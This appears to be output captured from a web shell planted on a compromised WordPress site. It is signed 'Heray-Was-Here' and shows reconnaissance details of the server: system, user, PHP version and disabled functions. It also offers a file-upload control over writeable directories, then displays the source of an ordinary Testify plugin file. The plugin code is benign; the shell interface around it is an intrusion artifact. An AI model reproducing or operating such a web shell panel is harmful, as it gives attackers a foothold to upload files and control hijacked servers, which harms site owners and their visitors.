Heray-Was-Here
Server : Apache
System : Linux ip-172-26-6-158 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
Directory :  /bitnami/wordpress/wp-content/plugins/testify/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /bitnami/wordpress/wp-content/plugins/testify/includes/testify_icon_customize_control.php
<?php
// This file includes code based on and/or copied from WordPress
// See license.txt for copyright and licensing details
// This file modified by Jonathan Hall, Dominika Rauk and/or others; last modified 2020-08-28

if (!defined('ABSPATH')) die();

if ( ! class_exists( 'Testify_Icon_Customize_Control' ) ) {
	class Testify_Icon_Customize_Control extends WP_Customize_Control {
		protected function render_content() {
			$val = $this->value();
			?>
			<label>
				<?php // Output the label and description if they were passed in.
				if ( isset( $this->label ) && '' !== $this->label ) {
					print '<span class="customize-control-title">'.esc_html( $this->label ).'</span>';
				}
				if ( isset( $this->description ) && '' !== $this->description ) {
					print '<span class="description customize-control-description">'.esc_html($this->description).'</span>';
				}
				?>
				<input type="hidden" <?php $this->input_attrs() ?> <?php $this->get_link() ?> class="testify_readmore_input" <?php $this->link(); ?>>
				<?php print testify_get_font_icon_list( $val ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- this function returns escaped HTML ?>
			</label>
		<?php
		}
	}
}
?>

Hry